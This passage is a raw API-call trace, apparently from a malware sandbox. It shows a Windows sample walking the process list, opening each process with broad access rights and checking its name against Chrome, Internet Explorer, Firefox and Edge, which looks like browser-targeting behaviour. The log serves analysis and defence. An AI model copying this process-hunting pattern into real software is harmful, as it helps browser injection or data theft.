	[0226.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5e08
	[0226.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.042] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.042] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.043] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.043] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.091] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x5e0c
	[0226.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.092] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.092] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.093] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.093] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5e10
	[0226.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.094] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.094] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.094] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.095] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.095] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.096] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5e14
	[0226.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.096] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.096] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.097] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.097] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.097] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.098] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5e18
	[0226.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.098] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.098] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.099] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.099] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0226.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5e1c
	[0226.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.100] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0226.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.100] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.101] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0226.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.101] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.101] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.102] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5e20
	[0226.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.102] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.102] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.103] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.103] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.103] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.103] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0226.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5e24
	[0226.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.104] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.104] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.105] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.105] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.105] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.105] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0226.106] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5e28
	[0226.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.106] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0226.106] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.106] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.107] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.108] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0226.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.109] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0226.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5e2c
	[0226.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.110] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0226.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.111] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.111] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0226.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.111] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0226.112] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5e30
	[0226.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.112] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0226.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.113] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.113] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0226.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.113] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.114] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0226.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5e34
	[0226.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.115] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0226.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.115] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.115] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0226.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.115] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0226.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5e38
	[0226.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.116] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0226.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.117] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.117] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0226.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.117] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.117] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0226.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5e3c
	[0226.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.118] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0226.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.119] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.119] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0226.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.119] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0226.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0226.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0226.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5e40
	[0226.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.121] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0226.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.122] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.122] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0226.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.123] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0226.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5e44
	[0226.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.125] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0226.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.125] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.125] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0226.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.125] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0226.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5e48
	[0226.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.126] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0226.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.127] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.127] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0226.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.127] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0226.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5e4c
	[0226.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.129] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0226.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.129] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.129] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0226.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.130] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0226.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5e50
	[0226.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.131] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0226.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.132] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.132] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0226.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.133] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0226.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5e54
	[0226.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.134] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0226.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.134] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.135] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0226.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.135] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.135] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0226.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5e58
	[0226.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.136] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0226.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.136] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.137] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0226.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.137] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.138] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0226.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5e5c
	[0226.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.186] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0226.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.186] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.187] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0226.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.187] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.188] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0226.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5e60
	[0226.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.188] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0226.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.189] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.189] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0226.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.189] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0226.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5e64
	[0226.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.190] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0226.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.190] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0226.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.191] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0226.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.191] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0226.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0226.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5e68
	[0226.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0226.192] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0226.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
